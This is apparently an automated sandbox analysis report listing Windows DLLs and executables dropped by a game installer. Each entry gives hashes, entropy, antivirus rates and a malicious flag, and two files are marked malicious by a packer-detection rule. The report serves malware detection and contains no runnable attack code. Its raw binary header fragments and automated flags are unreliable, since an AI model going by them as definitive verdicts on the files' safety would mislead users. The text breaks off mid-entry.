                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........B.........#.........>...f...........0.....h......................... ................ .........................{.......|...............................$...........................pA.......................................................text...4...........................`.P`.data...<....0......."..............@.0..rdata.......@.......$..............@.`@/4...........P.......(..............@.0@.bss.....d...`........................`..edata..{............2..............@.0@.idata..|............4..............@.0..CRT....,............:..............@.0..tls.................<..............@.0..reloc..$............>..............@.0B................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):15374
                                                                            Entropy (8bit):5.192037544202194
                                                                            Encrypted:false
                                                                            SSDEEP:384:lhgkOI7BGi9gKV6uq+u6JewsNhNXUwSCgQ:DT7BGVKPKbXF
                                                                            MD5:BEFD36FE8383549246E1FD49DB270C07
                                                                            SHA1:1EF12B568599F31292879A8581F6CD0279F3E92A
                                                                            SHA-256:B5942E8096C95118C425B30CEC8838904897CDEF78297C7BBB96D7E2D45EE288
                                                                            SHA-512:FD9AA6A4134858A715BE846841827196382D0D86F2B1AA5C7A249B770408815B0FE30C4D1E634E8D6D3C8FEDBCE4654CD5DC240F91D54FC8A7EFE7CAE2E569F4
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........<.........#.........8...............0.....f................................b......... ......................p..E.......h...........................................................P@......................................................text...............................`.P`.data...,....0....... ..............@.0..rdata.......@......."..............@.0@/4...........P.......$..............@.0@.bss.........`........................`..edata..E....p......................@.0@.idata..h............0..............@.0..CRT....,............6..............@.0..tls.................8..............@.0..reloc...............:..............@.0B................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):197646
                                                                            Entropy (8bit):6.1570532273946625
                                                                            Encrypted:false
                                                                            SSDEEP:3072:brPGp0y4SP+iBGgySYm+dE3sYrJqkAzhU88vsAGSW+:brPGaTEsHSYmbbOU8osAGG
                                                                            MD5:2C8EC61630F8AA6AAC674E4C63F4C973
                                                                            SHA1:64E3BB9AA505C66E87FE912D4EA3054ADF6CEF76
                                                                            SHA-256:DFD55D0DDD1A7D081FCE8E552DC29706A84DC6CA2FDD2F82D63F33D74E882849
                                                                            SHA-512:488378012FB5F477ED4636C37D7A883B1DAD0FBC671D238B577A9374EFE40AB781F5E483AE921F1909A9B7C1C2A3E78E29B533D3B6FFE15AAEE840CAD2DCF5D0
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...............................m................................]_........ ...................... ..A....0...............................`..............................p0.......................1..D............................text...............................`.P`.data...............................@.0..rdata..L0.......2..................@.`@/4...........P......................@.0@.bss..................................`..edata..A.... ......................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..reloc.......`......................@.0B................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):31936
                                                                            Entropy (8bit):6.6461204214578
                                                                            Encrypted:false
                                                                            SSDEEP:768:SEEn30ilOAb++HynTDbc3fwaVCPxWE/MM:SEa0YOU1HgU3fwaVCPxqM
                                                                            MD5:72E3BDD0CE0AF6A3A3C82F3AE6426814
                                                                            SHA1:A2FB64D5B9F5F3181D1A622D918262CE2F9A7AA3
                                                                            SHA-256:7AC8A8D5679C96D14C15E6DBC6C72C260AAEFB002D0A4B5D28B3A5C2B15DF0AB
                                                                            SHA-512:A876D0872BFBF099101F7F042AEAF1FD44208A354E64FC18BAB496BEEC6FDABCA432A852795CFC0A220013F619F13281B93ECC46160763AC7018AD97E8CC7971
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........P.........#.....&...L...............@.....d................................8......... .........................b............................P...,...................................R......................x................................text....%.......&..................`.P`.data........@.......*..............@.`..rdata.......P.......,..............@.0@/4...........`.......2..............@.0@.bss.........p........................`..edata..b............>..............@.0@.idata...............@..............@.0..CRT....,............H..............@.0..tls.................J..............@.0..reloc...............L..............@.0B................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):197120
Entropy (8bit):6.423554884287906
Encrypted:false
SSDEEP:6144:X+dMKihenEUunaA+mVMISPCG5vHglwiaJVZkRyAHeOdrQpCklkHy+axeY0R2JdXs:MagxOOZWP2dC28d+y2e
MD5:67247C0ACA089BDE943F802BFBA8752C
SHA1:508DA6E0CF31A245D27772C70FFA9A2AE54930A3
SHA-256:BAB8D388EA3AF1AABB61B8884CFAA7276A2BFD77789856DD610480C55E4D0A60
SHA-512:C4A690A53581D3E4304188FD772C6F1DA1C72ED2237A13951ACE8879D1986423813A6F7534FF506790CB81633CEB7FF6A6239C1F852725FBACA4B40D9AE3F2DB
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):115712
Entropy (8bit):6.401537154757194
Encrypted:false
SSDEEP:3072:rY4gILp0Vt7BMkvfHutO+eP0ZjflQf5xqkYXeo21sb2rqG70:rY4gILp0Vt77nLBCtQfjqv8qG70
MD5:840D631DA54C308B23590AD6366EBA77
SHA1:5ED0928667451239E62E6A0A744DA47C74E1CF89
SHA-256:6BAD60DF9A560FB7D6F8647B75C367FDA232BDFCA2291273A21179495DAC3DB9
SHA-512:1394A48240BA4EF386215942465BDE418C5C6ED73FC935FE7D207D2A1370155C94CDC15431985ED4E656CA6B777BA79FFC88E78FA3D99DB7E0E6EAC7D1663594
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):62478
Entropy (8bit):6.063363187934607
Encrypted:false
SSDEEP:768:q3s6+NMpjqudP/XB9rGCWLEc6wY3U0LvDcb0wGNPdqdRJy/5f4mdajO42iySAqB:q8zNM1nBId/ce7GNP6m/5AQGySAs
MD5:940EEBDB301CB64C7EA2E7FA0646DAA3
SHA1:0347F029DA33C30BBF3FB067A634B49E8C89FEC2
SHA-256:B0B56F11549CE55B4DC6F94ECBA84AEEDBA4300D92F4DC8F43C3C9EEEFCBE3C5
SHA-512:50D455C16076C0738FB1FECAE7705E2C9757DF5961D74B7155D7DFB3FAB671F964C73F919CC749D100F6A90A3454BFF0D15ED245A7D26ABCAA5E0FDE3DC958FD
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):26126
Entropy (8bit):6.048294343792499
Encrypted:false
SSDEEP:384:hhkxE9v7/GRm4v5OxlBWaEybb9p7aCyS/hU7CateHcUwSCnq6D:Yx6jGXvc5WaBb99yS/hQh
MD5:D1223F86EDF0D5A2D32F1E2AAAF8AE3F
SHA1:C286CA29826A138F3E01A3D654B2F15E21DBE445
SHA-256:E0E11A058C4B0ADD3892E0BEA204F6F60A47AFC86A21076036393607235B469C
SHA-512:7EA1FFB23F8A850F5D3893C6BB66BF95FAB2F10F236A781620E9DC6026F175AAE824FD0E03082F0CF13D05D13A8EEDE4F5067491945FCA82BBCDCF68A0109CFF
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):15374
Entropy (8bit):5.192037544202194
Encrypted:false
SSDEEP:384:lhgkOI7BGi9gKV6uq+u6JewsNhNXUwSCgQ:DT7BGVKPKbXF
MD5:BEFD36FE8383549246E1FD49DB270C07
SHA1:1EF12B568599F31292879A8581F6CD0279F3E92A
SHA-256:B5942E8096C95118C425B30CEC8838904897CDEF78297C7BBB96D7E2D45EE288
SHA-512:FD9AA6A4134858A715BE846841827196382D0D86F2B1AA5C7A249B770408815B0FE30C4D1E634E8D6D3C8FEDBCE4654CD5DC240F91D54FC8A7EFE7CAE2E569F4
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):867854
Entropy (8bit):4.9264497464202694
Encrypted:false
SSDEEP:12288:p3y+OSQJZyHHiz8ElQxPpspcQrRclB7OIlJiIoP:xSXyniz1lQxPpspcQrRcLZJi/
MD5:B476CA59D61F11B7C0707A5CF3FE6E89
SHA1:1A1E7C291F963C12C9B46E8ED692104C51389E69
SHA-256:AD65033C0D90C3A283C09C4DB6E2A29EF21BAE59C9A0926820D04EEBBF0BAF6D
SHA-512:D5415AC7616F888DD22560951E90C8A77D5DD355748FDCC3114CAA16E75EB1D65C43696C6AECD2D9FAF8C2D32D5A3EF7A6B8CB6F2C4747C2A82132D29C9ECBFE
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):68042
Entropy (8bit):6.090396152400884
Encrypted:false
SSDEEP:768:RX3HAdi7wgCsL6dVSngk2IFm3ZJVRDBLRROBBKRzPm3YRiF+ixh:NHQpe6SnZQLjICPm3Ytib
MD5:5DDA5D34AC6AA5691031FD4241538C82
SHA1:22788C2EBE5D50FF36345EA0CB16035FABAB8A6C
SHA-256:DE1A9DD251E29718176F675455592BC1904086B9235A89E6263A3085DDDCBB63
SHA-512:08385DE11A0943A6F05AC3F8F1E309E1799D28EA50BF1CA6CEB01E128C0CD7518A64E55E8B56A4B8EF9DB3ECD2DE33D39779DCA1FBF21DE735E489A09159A1FD
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):26126
Entropy (8bit):6.048294343792499
Encrypted:false
SSDEEP:384:hhkxE9v7/GRm4v5OxlBWaEybb9p7aCyS/hU7CateHcUwSCnq6D:Yx6jGXvc5WaBb99yS/hQh
MD5:D1223F86EDF0D5A2D32F1E2AAAF8AE3F
SHA1:C286CA29826A138F3E01A3D654B2F15E21DBE445
SHA-256:E0E11A058C4B0ADD3892E0BEA204F6F60A47AFC86A21076036393607235B469C
SHA-512:7EA1FFB23F8A850F5D3893C6BB66BF95FAB2F10F236A781620E9DC6026F175AAE824FD0E03082F0CF13D05D13A8EEDE4F5067491945FCA82BBCDCF68A0109CFF
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):126478
Entropy (8bit):6.268811819718352
Encrypted:false
SSDEEP:3072:UnNKg6JaJUeHjiaphKMLrn8uexz3TmBUg6xcE:UNcJGGehKMLJBUg6x
MD5:6E93C9C8AADA15890073E74ED8D400C9
SHA1:94757DBD181346C7933694EA7D217B2B7977CC5F
SHA-256:B6E2FA50E0BE319104B05D6A754FE38991E6E1C476951CEE3C7EBDA0DC785E02
SHA-512:A9F71F91961C75BB32871B1EFC58AF1E1710BDE1E39E7958AE9BB2A174E84E0DD32EBAAB9F5AE37275651297D8175EFA0B3379567E0EB0272423B604B4510852
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):648384
Entropy (8bit):6.666474522542094
Encrypted:false
SSDEEP:12288:gAQxmcOwzIYhoz/eZz4gOIwEODAAwnq6Nql1:gvmfAI6oz/uOIyDAAwDNql1
MD5:CE7DE939D74321A7D0E9BDF534B89AB9
SHA1:56082B4E09A543562297E098A36AADC3338DEEC5
SHA-256:A9DC70ABB4B59989C63B91755BA6177C491F6B4FE8D0BFBDF21A4CCF431BC939
SHA-512:03C366506481B70E8BF6554727956E0340D27CB2853609D6210472AEDF4B3180C52AAD9152BC2CCCBA005723F5B2E3B5A19D0DCE8B8D1E0897F894A4BFEEFE55
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):149845
Entropy (8bit):7.893881970959476
Encrypted:false
SSDEEP:3072:y0z4JQHu5EvSA/JqiK2s6g+hUCQiMVQ623hi3JKz8KQP6ZwhQrNrbZ:yUju5GY7l+CCYVQ62YUzXQiqhQrJbZ
MD5:526E02E9EB8953655EB293D8BAC59C8F
SHA1:7CA6025602681EF6EFDEE21CD11165A4A70AA6FE
SHA-256:E2175E48A93B2A7FA25ACC6879F3676E04A0C11BB8CDFD8D305E35FD9B5BBBB4
SHA-512:053EB66D17E5652A12D5F7FAF03F02F35D1E18146EE38308E39838647F91517F8A9DC0B7A7748225F2F48B8F0347B0A33215D7983E85FCA55EF8679564471F0B
Malicious:true
Yara Hits:
• Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-5IVSF.tmp, Author: Joe Security
Antivirus:
• Antivirus: ReversingLabs, Detection: 3%
Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):39304
Entropy (8bit):7.819409739152795
Encrypted:false
SSDEEP:768:i5GGx+OZPWuGdoiwUpPLH7IN3x1eW0kIAJbfT13MMnahRlmftuohQf:i5DxDPWMApPLsNhkVkI6R3TnalauoQ
MD5:C7A50ACE28DDE05B897E000FA398BBCE
SHA1:33DA507B06614F890D8C8239E71D3D1372E61DAA
SHA-256:F02979610F9BE2F267AA3260BB3DF0F79EEEB6F491A77EBBE719A44814602BCC
SHA-512:4CD7F851C7778C99AFED492A040597356F1596BD81548C803C45565975CA6F075D61BC497FCE68C6B4FEDC1D0B5FD0D84FEAA187DC5E149F4E8E44492D999358
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):17472
                                                                            Entropy (8bit):7.524548435291935
                                                                            Encrypted:false
                                                                            SSDEEP:384:IwwsQD13cT5HhSVeEQNW5kbbcGEh/qTio+lyTnGy:QRD13ySVeEOW5kbSSTHNTnr
                                                                            MD5:7B52BE6D702AA590DB57A0E135F81C45
                                                                            SHA1:518FB84C77E547DD73C335D2090A35537111F837
                                                                            SHA-256:9B5A8B323D2D1209A5696EAF521669886F028CE1ECDBB49D1610C09A22746330
                                                                            SHA-512:79C1959A689BDC29B63CA771F7E1AB6FF960552CADF0644A7C25C31775FE3458884821A0130B1BAB425C3B41F1C680D4776DD5311CE3939775A39143C873A6FE
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):258560
                                                                            Entropy (8bit):6.491223412910377
                                                                            Encrypted:false
                                                                            SSDEEP:6144:X+FRYMGwNozw5upAagZnb80OXrGSc+w9nI7ZMcyVhk233M:SGMGbw5upAagZb80SMXzkgM
                                                                            MD5:DB191B89F4D015B1B9AEE99AC78A7E65
                                                                            SHA1:8DAC370768E7480481300DD5EBF8BA9CE36E11E3
                                                                            SHA-256:38A75F86DB58EB8D2A7C0213861860A64833C78F59EFF19141FFD6C3B6E28835
                                                                            SHA-512:A27E26962B43BA84A5A82238556D06672DCF17931F866D24E6E8DCE88F7B30E80BA38B071943B407A7F150A57CF1DA13D2137C235B902405BEDBE229B6D03784
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):197646
                                                                            Entropy (8bit):6.1570532273946625
                                                                            Encrypted:false
                                                                            SSDEEP:3072:brPGp0y4SP+iBGgySYm+dE3sYrJqkAzhU88vsAGSW+:brPGaTEsHSYmbbOU8osAGG
                                                                            MD5:2C8EC61630F8AA6AAC674E4C63F4C973
                                                                            SHA1:64E3BB9AA505C66E87FE912D4EA3054ADF6CEF76
                                                                            SHA-256:DFD55D0DDD1A7D081FCE8E552DC29706A84DC6CA2FDD2F82D63F33D74E882849
                                                                            SHA-512:488378012FB5F477ED4636C37D7A883B1DAD0FBC671D238B577A9374EFE40AB781F5E483AE921F1909A9B7C1C2A3E78E29B533D3B6FFE15AAEE840CAD2DCF5D0
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):5960
                                                                            Entropy (8bit):5.956401374574174
                                                                            Encrypted:false
                                                                            SSDEEP:96:dj78cqhzbWKlECE7WbjDFf6IhaYYUOAoDf4+XCVhovG9AkM7Ui10:CjlEJ7WbjDFf6waYvdc4gYAkM10
                                                                            MD5:B3CC560AC7A5D1D266CB54E9A5A4767E
                                                                            SHA1:E169E924405C2114022674256AFC28FE493FBFDF
                                                                            SHA-256:EDDE733A8D2CA65C8B4865525290E55B703530C954F001E68D1B76B2A54EDCB5
                                                                            SHA-512:A836DECACB42CC3F7D42E2BF7A482AE066F5D1DF08CCCC466880391028059516847E1BF71E4C6A90D2D34016519D16981DDEEACFB94E166E4A9A720D9CC5D699
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):240654
                                                                            Entropy (8bit):6.518503846592995
                                                                            Encrypted:false
                                                                            SSDEEP:6144:yZDfF4DjzIHBV+bUeenu+t+oSTdjpNZ7utS81qpHW4paP2L:ekjzMBVKXeuq+oSTdjpr7N8f+L
                                                                            MD5:4F0C85351AEC4B00300451424DB4B5A4
                                                                            SHA1:BB66D807EDE0D7D86438207EB850F50126924C9D
                                                                            SHA-256:CC0B53969670C7275A855557EA16182C932160BC0F8543EFFC570F760AE2185E
                                                                            SHA-512:80C84403ED47380FF75EBA50A23E565F7E5C68C7BE8C208A5A48B7FB0798FF51F3D33780C902A6F8AB0E6DB328860C071C77B93AC88CADF84FEF7DF34DE3E2DA
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):22542
                                                                            Entropy (8bit):5.5875455203930615
                                                                            Encrypted:false
                                                                            SSDEEP:384:RKAPwPQJgZd3rw0bGMtyz1fiaqmjj1nFY4j70UotV9mRyK:YPQJgZZwUGH1fJljj1+D18
                                                                            MD5:E1C0147422B8C4DB4FC4C1AD6DD1B6EE
                                                                            SHA1:4D10C5AD96756CBC530F3C35ADCD9E4B3F467CFA
                                                                            SHA-256:124F210C04C12D8C6E4224E257D934838567D587E5ABAEA967CBD5F088677049
                                                                            SHA-512:A163122DFFE729E6F1CA6EB756A776F6F01A784A488E2ACCE63AEAFA14668E8B1148BE948EB4AF4CA8C5980E85E681960B8A43C94B95DFFC72FCCEE1E170BD9A
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):227328
                                                                            Entropy (8bit):6.641153481093122
                                                                            Encrypted:false
                                                                            SSDEEP:6144:jtJXnqDMJgH50aKyumLCGTrS4ifbjoO88k:KqgHlKyumLCGTrS4inoZ
                                                                            MD5:BC824DC1D1417DE0A0E47A30A51428FD
                                                                            SHA1:C909C48C625488508026C57D1ED75A4AE6A7F9DB
                                                                            SHA-256:A87AA800F996902F06C735EA44F4F1E47F03274FE714A193C9E13C5D47230FAB
                                                                            SHA-512:566B5D5DDEA920A31E0FB9E048E28EF2AC149EF075DB44542A46671380F904427AC9A6F59FBC09FE3A4FBB2994F3CAEEE65452FE55804E403CEABC091FFAF670
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):68876
                                                                            Entropy (8bit):7.922125376804506
                                                                            Encrypted:false
                                                                            SSDEEP:1536:q0Z4sz1ZMjCjDIhoLffiedENahBzzxO/JfgmYFGKEvi8TxCI+vHVl:v4MzMjGkhoLfsahS/JYN2vUl
                                                                            MD5:4E35BA785CD3B37A3702E577510F39E3
                                                                            SHA1:A2FD74A68BEFF732E5F3CB0835713AEA8D639902
                                                                            SHA-256:0AFE688B6FCA94C69780F454BE65E12D616C6E6376E80C5B3835E3FA6DE3EB8A
                                                                            SHA-512:1B839AF5B4049A20D9B8A0779FE943A4238C8FBFBF306BC6D3A27AF45C76F6C56B57B2EC8F087F7034D89B5B139E53A626A8D7316BE1374EAC28B06D23E7995D
                                                                            Malicious:false
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-BDC3N.tmp, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):845312
                                                                            Entropy (8bit):6.581151900686739
                                                                            Encrypted:false
                                                                            SSDEEP:24576:PgQ5Lxf4qcB5SdtFJPAYiXbJ1luVw6DbhJLJbCKShfCtk/8ou/UvfK7hs4I:H5Ng9zK5Puq7hsN
                                                                            MD5:00C672988C2B0A2CB818F4D382C1BE5D
                                                                            SHA1:57121C4852B36746146B10B5B97B5A76628F385F
                                                                            SHA-256:4E9F3E74E984B1C6E4696717AE36396E7504466419D8E4323AF3A89DE2E2B784
                                                                            SHA-512:C36CAE5057A4D904EBDB5495E086B8429E99116ACBE7D0F09FB66491F57A7FC44232448208044597316A53C7163E18C2F93336B37B302204C8AF6C8F1A9C8353
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):562190
                                                                            Entropy (8bit):6.388293171196564
                                                                            Encrypted:false
                                                                            SSDEEP:12288:uCtwsqIfrUmUBrusLdVAjA1ATAtuQ8T2Q8TOksqHOuCHWoEuEc4XEmEVEEAcIHAj:uqiIoYmOuNNQ1zU/xGl
                                                                            MD5:713D04E7396D3A4EFF6BF8BA8B9CB2CD
                                                                            SHA1:D824F373C219B33988CFA3D4A53E7C2BFA096870
                                                                            SHA-256:00FB8E819FFDD2C246F0E6C8C3767A08E704812C6443C8D657DFB388AEB27CF9
                                                                            SHA-512:30311238EF1EE3B97DF92084323A54764D79DED62BFEB12757F4C14F709EB2DBDF6625C260FB47DA2D600E015750394AA914FC0CC40978BA494D860710F9DC40
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):43520
                                                                            Entropy (8bit):6.232860260916194
                                                                            Encrypted:false
                                                                            SSDEEP:768:XozEJVjDF38DrOPwLg0cAY7K+k+Y+TyHMjMbHVJx9jm3LkkteFfXbBekdAnPKx:Xo4JJDirOoLg0C7F/rDGdpB52PK
                                                                            MD5:B162992412E08888456AE13BA8BD3D90
                                                                            SHA1:095FA02EB14FD4BD6EA06F112FDAFE97522F9888
                                                                            SHA-256:2581A6BCA6F4B307658B24A7584A6B300C91E32F2FE06EB1DCA00ADCE60FA723
                                                                            SHA-512:078594DE66F7E065DCB48DA7C13A6A15F8516800D5CEE14BA267F43DC73BC38779A4A4ED9444AFDFA581523392CBE06B0241AA8EC0148E6BCEA8E23B78486824
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....z.......D................,n.........................p.......`........ ...................... .......0...............................`..............................t........................0...............................text....x.......z..................`.P`.data...,............~..............@.0..rdata..............................@.P@.eh_fram|...........................@.0@.bss.....B............................`..edata....... ......................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..reloc.......`......................@.0B................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):19008
                                                                            Entropy (8bit):7.672481244971812
                                                                            Encrypted:false
                                                                            SSDEEP:384:dz7otnjFa4ECX3yeGjA+tSXGnUav92hca+XWRlsuG+is:po7GU+szS3W7sQ7
                                                                            MD5:8EE91149989D50DFCF9DAD00DF87C9B0
                                                                            SHA1:E5581E6C1334A78E493539F8EA1CE585C9FFAF89
                                                                            SHA-256:3030E22F4A854E11A8AA2128991E4867CA1DF33BC7B9AFF76A5E6DEEF56927F6
                                                                            SHA-512:FA04E8524DA444DD91E4BD682CC9ADEE445259E0C6190A7DEF82B8C4478A78AAA8049337079AD01F7984DBA28316D72445A0F0D876F268A062AD9B8FF2A6E58D
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...................................D.... ..PE..L....+vS...........!....6...6.......6........p......................................................................0..........P.......@...................tM.......................................................................................................>..................`....rsrc...........@....H..............@..@....................................@...........6...........................`.......................................D...n'......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!......f.`P....h.5..j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X............f.......Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$...*.P(.*.....P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I..K..........(...|...}K...................E..K....p..j...g........Q..........y...........
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):294926
